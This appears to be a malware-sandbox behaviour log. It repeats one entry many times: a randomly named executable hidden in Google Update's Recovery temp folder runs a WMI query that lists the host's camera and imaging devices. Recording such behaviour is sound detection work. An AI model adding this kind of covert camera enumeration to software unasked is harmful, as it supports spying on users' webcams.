                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
